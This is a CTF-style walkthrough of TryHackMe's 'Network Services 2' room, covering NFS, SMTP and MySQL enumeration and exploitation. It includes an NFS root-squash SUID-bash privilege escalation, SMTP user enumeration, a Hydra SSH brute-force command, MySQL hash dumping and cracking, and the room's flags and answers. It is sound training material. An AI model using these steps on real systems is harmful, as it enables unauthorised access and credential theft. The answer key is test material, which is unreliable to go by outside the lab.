TryHackMe | Network Services 2 Walkthrough

Enes Cayvarlı
14 min read · Nov 28, 2022


Hi there, I’m glad to see you here. In this article we’ll work through the “Network Services 2” room on TryHackMe (Cyber Defense learning path). In some sections I’ll give a brief overview of the subject. Don’t forget: you must always research to learn more. I hope it will be helpful for you. Let’s start!

Network Services

Contents:

-Cyber Defense Introduction | Network Services 2

  • Understanding NFS
  • Enumerating NFS
  • Exploiting NFS
  • Understanding SMTP
  • Enumerating SMTP
  • Exploiting SMTP
  • Understanding MySQL
  • Enumerating MySQL
  • Exploiting MySQL

Cyber Defense Introduction | Network Services 2

Understanding NFS

NFS stands for “Network File System” and allows a system to share directories and files with others over a network.

-By using NFS, users and programs can access files on remote systems almost as if they were local files.

-Using the NFS protocol, you can transfer files between computers running Windows and other non-Windows operating systems, such as Linux, MacOS or UNIX.

NFS (Network File System)

Q1: What does NFS stand for?

A1: Network File System

Q2: What process allows an NFS client to interact with a remote directory as though it was a physical device?

A2: Mounting

Q3: What does NFS use to represent files and directories on the server?

A3: file handle

Q4: What protocol does NFS use to communicate between the server and client?

A4: RPC

Q5: What two pieces of user data does the NFS server take as parameters for controlling user permissions? Format: parameter 1 / parameter 2

A5: user id / group id

Q6: Can a Windows NFS server share files with a Linux client? (Y/N)

A6: Y

Q7: Can a Linux NFS server share files with a MacOS client? (Y/N)

A7: Y

Q8: What is the latest version of NFS? [released in 2016, but is still up to date as of 2020] This will require external research.

A8: 4.2

Enumerating NFS

nfs-common: This package provides the client-side NFS tools. Primarily we are concerned with “showmount” (lists what a server exports) and “mount.nfs” (the helper behind “mount -t nfs”), as these are going to be most useful to us when it comes to extracting information from the NFS share.

-You can install nfs-common using “apt install nfs-common”.

Q1: Conduct a thorough port scan of your choosing, how many ports are open?

A1: 7

Q2: Which port contains the service we’re looking to enumerate?

A2: 2049

Q3: Now, use /usr/sbin/showmount -e [IP] to list the NFS shares, what is the name of the visible share?

A3: /home

Q4: Time to mount the share to our local machine!

First, use “mkdir /tmp/mount” to create a directory on your machine to mount the share to. This is in the /tmp directory- so be aware that it will be removed on restart.

Then, use the mount command we broke down earlier to mount the NFS share to your local machine. Change directory to where you mounted the share- what is the name of the folder inside?

A4: cappucino

Step 1: Use “mkdir” command to create directory.

Step 2: Use the “mount” command to mount the NFS share to your local machine.

mount -t nfs IP:share /tmp/mount/ -o nolock

mount: Execute the mount command

-t nfs: Type of filesystem to mount, specifying that it’s NFS

IP:share: The IP address of the NFS server and the name of the share we wish to mount (here the share is /home, as showmount reported)

-o nolock: Mount option that specifies not to use NLM locking. Write it as “-o nolock”: the spelling “-nolock” that appears in the room text is parsed by mount as “-n -o lock”, which does not disable locking.

Q5: Have a look inside this directory, look at the files. Looks like we’re inside a user’s home directory…

A5: No answer needed

Q6: Interesting! Let’s do a bit of research now, have a look through the folders. Which of these folders could contain keys that would give us remote access to the server?

A6: .ssh

Q7: Which of these keys is most useful to us?

A7: id_rsa

Q8: Copy this file to a different location on your local machine, and change the permissions to “600” using “chmod 600 [file]” (ssh refuses to use a private key that is readable by other users).

Assuming we were right about what type of directory this is, we can pretty easily work out the name of the user this key corresponds to.

Can we log into the machine using ssh -i <key-file> <username>@<ip> ? (Y/N)

A8: Y

Step 1: Copy this file to a different location on your local machine using the “cp” command.

Step 2: Change the permissions to “600” using “chmod 600 [file]”.

Step 3: Connect via SSH using id_rsa file.

Exploiting NFS

-By default, on NFS shares, root squashing is enabled: requests arriving with uid 0 are mapped to the anonymous user (nobody), which prevents anyone connecting to the NFS share from having root access to the NFS volume. The chain below only works because this share was exported with root squashing disabled (no_root_squash).

NFS Access:

1-Gain Low Privilege Shell

2-Upload Bash Executable to the NFS share

3-Set SUID Permissions Through NFS Due To Misconfigured Root Squash

4-Login through SSH

5-Execute SUID Bit Bash Executable

6-ROOT ACCESS
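The chain above hinges on one server-side setting: the share being exported with no_root_squash. As an added example (not part of the room or of this write-up), here is a small Python audit of /etc/exports that flags exactly that condition, together with the related “exported to any host” and “insecure” options, applying the exports(5) defaults (ro, root_squash, secure) when an option is not stated. The file contents are a constructed sample; only the /home share name echoes the room’s showmount output.

```python
"""Audit /etc/exports for the misconfiguration the NFS-to-root chain relies on.

Added example, not from the TryHackMe room or this write-up. SAMPLE_EXPORTS is
constructed; the /home share name mirrors the room's showmount output.
"""

# Constructed sample file. A line is: <path> <client>(<opts>) [<client>(<opts>) ...]
SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample)
/home        *(rw,sync,no_root_squash,no_subtree_check)
/srv/pub     10.0.0.0/24(ro,sync,root_squash)  backup.internal(rw,no_subtree_check)
/srv/media   192.168.1.50(rw,insecure,all_squash,anonuid=65534)
"""

# Client specs that mean "anyone who can reach port 2049".
WORLD = {"*", "0.0.0.0/0", "::/0"}


def parse_exports(text):
    """Return one {'path','host','options'} dict per client spec in an exports file."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        path, *specs = line.split()              # paths containing spaces would need quoting
        for spec in specs:
            host, _, opts = spec.partition("(")  # "host(opts)" or bare "host"
            options = [o for o in opts.rstrip(")").split(",") if o]
            entries.append({"path": path, "host": host, "options": options})
    return entries


def effective(options):
    """Apply exports(5) defaults: ro, root_squash and secure unless overridden.

    Returns (writable, root_squash, secure).
    """
    writable = "rw" in options
    # all_squash maps every uid to anonymous, so root is squashed as well.
    root_squash = "all_squash" in options or "no_root_squash" not in options
    secure = "insecure" not in options       # secure = source port must be < 1024
    return writable, root_squash, secure


def audit_exports(text):
    """Return (severity, 'path -> host', message) findings for risky exports."""
    findings = []
    for e in parse_exports(text):
        writable, root_squash, secure = effective(e["options"])
        where = f'{e["path"]} -> {e["host"]}'
        if not root_squash and writable:
            findings.append(("CRITICAL", where,
                             "rw export with no_root_squash: a root user on any "
                             "permitted client can write root-owned SUID binaries"))
        elif not root_squash:
            findings.append(("HIGH", where,
                             "no_root_squash on a read-only export: client root "
                             "can read files that are normally root-only"))
        if e["host"] in WORLD:
            findings.append(("HIGH", where, "exported to any host"))
        if not secure:
            findings.append(("MEDIUM", where,
                             "insecure: requests accepted from unprivileged source "
                             "ports, so any local user on a permitted client can "
                             "send NFS requests claiming any uid/gid"))
    return findings


if __name__ == "__main__":
    for severity, where, msg in audit_exports(SAMPLE_EXPORTS):
        print(f"[{severity}] {where}: {msg}")
```

NFS with AUTH_SYS (the default) simply believes the uid and gid the client puts in each request, which is why root squashing is the only thing standing between a client root user and root-owned files on the export; “secure” merely limits that trust to processes privileged enough to bind a low port on the client.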

Q1: First, change directory to the mount point on your machine, where the NFS share should still be mounted, and then into the user’s home directory.

A1: No answer needed

Q2: Download the bash executable to your Downloads directory. Then use “cp ~/Downloads/bash .” to copy the bash executable to the NFS share. The copied bash shell must be owned by root; you can set this using “sudo chown root bash” (the chown is honoured over NFS only because root squashing is disabled on this share).

A2: No answer needed

Step 1: Download the bash executable to your Downloads directory.

Step 2: Use “cp ~/Downloads/bash .” to copy the bash executable to the NFS share.

Step 3: The copied bash shell must be owned by root; set this using “sudo chown root bash”.

Q3: Now, we’re going to add the SUID bit permission to the bash executable we just copied to the share using “sudo chmod +[permission] bash”. What letter do we use to set the SUID bit set using chmod?

A3: s

Q4: Let’s do a sanity check, let’s check the permissions of the “bash” executable using “ls -la bash”. What does the permission set look like? Make sure that it ends with -sr-x.

A4: -rwsr-sr-x

Q5: Now, SSH into the machine as the user. List the directory to make sure the bash executable is there. Now, the moment of truth. Let’s run it with “./bash -p”. The -p flag starts bash in privileged mode: without it, bash notices that its effective uid (root, from the SUID bit) differs from the real uid and resets the effective uid to the real one, dropping the privileges we just gave it.

A5: No answer needed

Q6: Great! If all’s gone well you should have a shell as root! What’s the root flag?

A6: THM{nfs_got_pwned}

root.txt

Congratulations! You found the flag.

Understanding SMTP

The Simple Mail Transfer Protocol (SMTP) is a technical standard for transmitting electronic mail (email) over a network.

The Simple Mail Transfer Protocol (SMTP)

POP, or “Post Office Protocol”, and IMAP, “Internet Message Access Protocol”, are both email protocols that are responsible for the transfer of email between a client and a mail server (retrieval, whereas SMTP handles sending).

How does SMTP work?

1-The mail user agent, which is either your email client or an external program, connects to the SMTP server of your domain, e.g. smtp.google.com. This initiates the SMTP handshake. This connection works over the SMTP port, which is usually 25. Once these connections have been made and validated, the SMTP session starts.

2-The process of sending mail can now begin. The client first submits the sender’s and recipient’s email addresses, the body of the email and any attachments to the server.

3-The SMTP server then checks whether the domain names of the recipient and the sender are the same.

4-The SMTP server of the sender will make a connection to the recipient’s SMTP server before relaying the email. If the recipient’s server can’t be accessed or is not available, the email is put into an SMTP queue.

5-Then, the recipient’s SMTP server will verify the incoming email. It does this by checking whether the domain and user name are recognised. The server will then forward the email to the POP or IMAP server, as shown in the diagram above.

6-The email will then show up in the recipient’s inbox.

POP/IMAP

Q1: What does SMTP stand for?

A1: Simple Mail Transfer Protocol

Q2: What does SMTP handle the sending of? (answer in plural)

A2: emails

Q3: What is the first step in the SMTP process?

A3: SMTP handshake

Q4: What is the default SMTP port?

A4: 25

Q5: Where does the SMTP server send the email if the recipient’s server is not available?

A5: smtp queue

Q6: On what server does the Email ultimately end up on?

A6: POP/IMAP

Q7: Can a Linux machine run an SMTP server? (Y/N)

A7: Y

Q8: Can a Windows machine run an SMTP server? (Y/N)

A8: Y

Enumerating SMTP

Q1: First, lets run a port scan against the target machine, same as last time. What port is SMTP running on?

A1: 25

Q2: Okay, now we know what port we should be targeting, let’s start up Metasploit. What command do we use to do this?

If you would like some more help, or practice using, Metasploit, Darkstar has an amazing room on Metasploit that you can check out here:

https://tryhackme.com/room/rpmetasploit

A2: msfconsole

msfconsole -q: the -q flag suppresses the banner on startup.

Q3: Let’s search for the module “smtp_version”, what’s its full module name?

A3: auxiliary/scanner/smtp/smtp_version

Q4: Great, now- select the module and list the options. How do we do this?

A4: options

Q5: Have a look through the options, does everything seem correct? What is the option we need to set?

A5: RHOSTS

Q6: Set that to the correct value for your target machine. Then run the exploit. What’s the system mail name?

A6: polosmtp.home

Q7: What Mail Transfer Agent (MTA) is running the SMTP server? This will require some external research.

A7: Postfix

Q8: Good! We’ve now got a good amount of information on the target system to move onto the next stage. Let’s search for the module “smtp_enum”, what’s its full module name?

A8: auxiliary/scanner/smtp/smtp_enum

Q9: We’re going to be using the “top-usernames-shortlist.txt” wordlist from the Usernames subsection of seclists (/usr/share/wordlists/SecLists/Usernames if you have it installed).

Seclists is an amazing collection of wordlists. If you’re running Kali or Parrot you can install seclists with: “sudo apt install seclists” Alternatively, you can download the repository from here:

https://github.com/danielmiessler/SecLists

What option do we need to set to the wordlist’s path?

A9: USER_FILE

Q10: Once we’ve set this option, what is the other essential parameter we need to set?

A10: RHOSTS

Q11: Now, run the exploit, this may take a few minutes, so grab a cup of tea, coffee, water. Keep yourself hydrated!

A11: No answer needed

Q12: Okay! Now that’s finished, what username is returned?

A12: administrator
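To make the two Metasploit steps above concrete (smtp_version reading the 220 banner for the system mail name and MTA, smtp_enum probing each name from the shortlist with VRFY), here is an added Python example that is not part of the room or of this write-up. It starts a constructed stand-in for a Postfix server on a loopback port so it runs offline, then enumerates it; the hostname polosmtp.home, the set of “local” users and the five-name shortlist are assumptions chosen to mirror the room’s answers. Against the real target you would call smtp_enum() with its address and port 25 instead of starting the fake.

```python
"""SMTP banner grab plus VRFY user enumeration, with both sides of the dialogue.

Added example (not from the TryHackMe room or this write-up). The server side is
a constructed stand-in that answers the way Postfix does; FAKE_MAIL_NAME,
FAKE_LOCAL_USERS and SHORTLIST are assumptions mirroring the room's answers.
"""
import socket
import socketserver
import threading

FAKE_MAIL_NAME = "polosmtp.home"                                 # assumed
FAKE_BANNER = f"220 {FAKE_MAIL_NAME} ESMTP Postfix (Ubuntu)"
FAKE_LOCAL_USERS = {"root", "administrator"}                     # constructed
SHORTLIST = ["admin", "administrator", "guest", "root", "test"]  # constructed


class FakePostfixHandler(socketserver.StreamRequestHandler):
    """Just enough of RFC 5321 to answer EHLO, VRFY and QUIT like Postfix."""

    def _reply(self, text):
        self.wfile.write((text + "\r\n").encode())

    def handle(self):
        self._reply(FAKE_BANNER)                  # server speaks first
        while True:
            raw = self.rfile.readline()
            if not raw:
                return
            cmd, _, arg = raw.decode(errors="replace").strip().partition(" ")
            cmd = cmd.upper()
            if cmd in ("EHLO", "HELO"):
                self._reply(f"250-{FAKE_MAIL_NAME}")   # multi-line reply, as real MTAs send
                self._reply("250 PIPELINING")
            elif cmd == "VRFY":
                user = arg.strip().lower()
                if user in FAKE_LOCAL_USERS:
                    # Postfix confirms a local user with 252, not 250.
                    self._reply(f"252 2.0.0 {user}")
                else:
                    self._reply(f"550 5.1.1 <{user}>: Recipient address rejected: "
                                "User unknown in local recipient table")
            elif cmd == "QUIT":
                self._reply("221 2.0.0 Bye")
                return
            else:
                self._reply("502 5.5.2 Error: command not recognized")


def read_reply(f):
    """Read one SMTP reply, absorbing 'NNN-' continuation lines; return (code, lines)."""
    lines = []
    while True:
        line = f.readline().decode(errors="replace").rstrip("\r\n")
        lines.append(line)
        if len(line) < 4 or line[3] != "-":
            return line[:3], lines


def parse_banner(banner):
    """What smtp_version reports: the system mail name and a best-effort MTA guess."""
    parts = banner.split()
    mail_name = parts[1] if len(parts) > 1 else ""
    mta = next((m for m in ("Postfix", "Exim", "Sendmail") if m in banner), "unknown")
    return {"mail_name": mail_name, "mta": mta}


def smtp_enum(host, port, candidates, timeout=5.0):
    """Banner grab and VRFY sweep: the manual equivalent of smtp_version + smtp_enum.

    250/251/252 count as 'exists'; 5xx means rejected. A server that answers
    252 for every name is disclosing nothing, so that case is flagged.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        f = s.makefile("rb")
        _, banner_lines = read_reply(f)
        s.sendall(b"EHLO enum.local\r\n")
        read_reply(f)
        found, codes = [], []
        for user in candidates:
            s.sendall(f"VRFY {user}\r\n".encode())
            code, _ = read_reply(f)
            codes.append(code)
            if code in ("250", "251", "252"):
                found.append(user)
        s.sendall(b"QUIT\r\n")
        read_reply(f)
    inconclusive = bool(codes) and all(c == "252" for c in codes)
    return {"banner": banner_lines[0], "found": found, "inconclusive": inconclusive}


def demo():
    """Start the fake MTA on a random loopback port, enumerate it, tear it down."""
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakePostfixHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        result = smtp_enum("127.0.0.1", server.server_address[1], SHORTLIST)
    finally:
        server.shutdown()
        server.server_close()
    result["version"] = parse_banner(result["banner"])
    return result


if __name__ == "__main__":
    r = demo()
    print(r["version"], r["found"], "(inconclusive)" if r["inconclusive"] else "")
```

Two things worth knowing before trusting the output on a real target: Postfix answers 252 rather than 250 for a genuine local user, so 252 has to be treated as a hit, but an administrator can set disable_vrfy_command = yes, after which every VRFY gets the same 252 and the sweep is uninformative (the inconclusive flag); the fallback then is MAIL FROM followed by RCPT TO for each candidate, which the server must answer honestly to deliver mail at all.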

Exploiting SMTP

We have a few vital pieces of information:

1-A user account name

2-The type of SMTP server and Operating System running

We know from our port scan, that the only other open port on this machine is an SSH login. We’re going to use this information to try and bruteforce the password of the SSH login for our user using Hydra.

Q1: What is the password of the user we found during our enumeration stage?

A1: alejandro

Hydra is a parallelized login cracker which supports numerous protocols to attack.

hydra -l administrator -P /usr/share/wordlists/rockyou.txt 10.10.36.19 ssh

-l: login with LOGIN name

-P: load several passwords from FILE

[machine IP]: the IP address of the target machine

ssh / protocol: sets the protocol

Q2: Great! Now, let’s SSH into the server as the user, what are the contents of smtp.txt?

A2: THM{who_knew_email_servers_were_c00l?}

smtp.txt

Congratulations! You found the flag.

Understanding MySQL

SQL is a standard language for accessing and manipulating databases.

-SQL stands for Structured Query Language.

-SQL lets you access and manipulate databases.

SQL (Structured Query Language)

MySQL is an Oracle-backed open source relational database management system (RDBMS) based on Structured Query Language (SQL). MySQL runs on virtually all platforms, including Linux, UNIX and Windows.

MySQL

RDBMS:

-RDBMS stands for Relational Database Management System.

-RDBMS is the basis for SQL, and for all modern database systems such as MSSQL Server, IBM DB2, Oracle, MySQL, and Microsoft Access.

-The data in RDBMS is stored in database objects called tables. A table is a collection of related data entries and it consists of columns and rows.

How does MySQL work?

1-MySQL creates a database for storing and manipulating data, defining the relationship of each table.

2-Clients make requests by making specific statements in SQL.

3-The server will respond to the client with whatever information has been requested.

Q1: What type of software is MySQL?

A1: relational database management system

Q2: What language is MySQL based on?

A2: SQL

Q3: What communication model does MySQL use?

A3: client-server

Q4: What is a common application of MySQL?

A4: back end database

Q5: What major social network uses MySQL as their back-end database? This will require further research.

A5: Facebook

Enumerating MySQL

Q1: As always, let’s start out with a port scan, so we know what port the service we’re trying to attack is running on. What port is MySQL using?

A1: 3306

Q2: Good, now we think we have a set of credentials. Let’s double check that by manually connecting to the MySQL server. We can do this using the command “mysql -h [IP] -u [username] -p”. If a newer mysql client aborts the connection with an SSL error, retry with “--skip-ssl” added.

A2: No answer needed

hydra

Q3: Okay, we know that our login credentials work. Lets quit out of this session with “exit” and launch up Metasploit.

A3: No answer needed

Q4: We’re going to be using the “mysql_sql” module.

Search for, select and list the options it needs. What three options do we need to set? (in descending order).

A4: PASSWORD/RHOSTS/USERNAME

Q5: Run the exploit. By default it will test with the “select version()” command, what result does this give you?

A5: 5.7.29-0ubuntu0.18.04.1

Q6: Great! We know that our exploit is landing as planned. Let’s try to gain some more ambitious information. Change the “sql” option to “show databases”. how many databases are returned?

A6: 4

Exploiting MySQL

We know:

1-MySQL server credentials

2-The version of MySQL running

3-The number of Databases, and their names.

Q1: First, let’s search for and select the “mysql_schemadump” module. What’s the module’s full name?

A1: auxiliary/scanner/mysql/mysql_schemadump

Q2: Great! Now, you’ve done this a few times by now so I’ll let you take it from here. Set the relevant options, run the exploit. What’s the name of the last table that gets dumped?

A2: x$waits_global_by_latency

Q3: Awesome, you have now dumped the tables, and column names of the whole database. But we can do one better… search for and select the “mysql_hashdump” module. What’s the module’s full name?

A3: auxiliary/scanner/mysql/mysql_hashdump

Q4: Again, I’ll let you take it from here. Set the relevant options, run the exploit. What non-default user stands out to you?

A4: carl

Q5: Another user! And we have their password hash. This could be very interesting. Copy the hash string in full, like bob:*HASH, to a text file on your local machine called “hash.txt”.

What is the user/hash combination string?

A5: carl:*EA031893AA21444B170FC2162A56978B8CEECE18

Q6: Now, we need to crack the password! Let’s try John the Ripper against it using “john hash.txt”. John should auto-detect the format as mysql-sha1; if it picks something else, be explicit with “john --format=mysql-sha1 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt”, and use “john --show hash.txt” to print what it cracked. What is the password of the user we found?

A6: doggie

john
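What john is doing with that string, as an added Python example (not from the room or this write-up): a mysql_native_password hash is “*” followed by SHA1(SHA1(password)) in upper-case hex, unsalted, which is why a wordlist attack on it is cheap. WORDLIST is a constructed five-word stand-in for rockyou.txt; the only values taken from elsewhere are carl’s hash as dumped above and the “mypass” test vector from the MySQL reference manual.

```python
"""Reproduce mysql_native_password hashing and a wordlist attack on a dumped hash.

Added example (not part of the TryHackMe room or this write-up). WORDLIST is a
constructed stand-in for rockyou.txt; DUMPED is the line mysql_hashdump printed.
"""
import hashlib


def mysql_native_hash(password: str) -> str:
    """MySQL 4.1+ / mysql_native_password: '*' + HEX(SHA1(SHA1(password)))."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()   # raw bytes, not hex
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def parse_hashdump_line(line: str):
    """'user:*HASH' as written by mysql_hashdump -> (user, HASH).

    Rejects anything that is not a 41-char '*' hash: MySQL 8's default
    caching_sha2_password hashes start with '$A$005$' and are salted and
    iterated SHA-256, so feeding them to a mysql-sha1 cracker is pointless.
    """
    user, _, h = line.strip().partition(":")
    if not (h.startswith("*") and len(h) == 41):
        raise ValueError(f"{user}: not a mysql_native_password hash")
    return user, h.upper()


def crack(target_hash: str, wordlist):
    """Return the first candidate whose hash matches, or None."""
    for candidate in wordlist:
        candidate = candidate.rstrip("\n")        # wordlist files end lines with \n
        if mysql_native_hash(candidate) == target_hash.upper():
            return candidate
    return None


DUMPED = "carl:*EA031893AA21444B170FC2162A56978B8CEECE18"          # from mysql_hashdump above
WORDLIST = ["password", "123456", "letmein", "doggie", "qwerty"]    # constructed

if __name__ == "__main__":
    user, h = parse_hashdump_line(DUMPED)
    print(user, crack(h, WORDLIST))
```

Because the scheme is unsalted, every user with the same password has the same hash, and a precomputed table of SHA1(SHA1(w)) over a wordlist cracks an entire dump at once; that is the practical reason the page’s next question about password reuse is worth asking.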

Q7: Awesome. Password reuse is not only extremely dangerous, but extremely common. What are the chances that this user has reused their password for a different service?

What are the contents of MySQL.txt?

A7: THM{congratulations_you_got_the_mySQL_flag}

MySQL.txt

Congratulations! You found the flag.
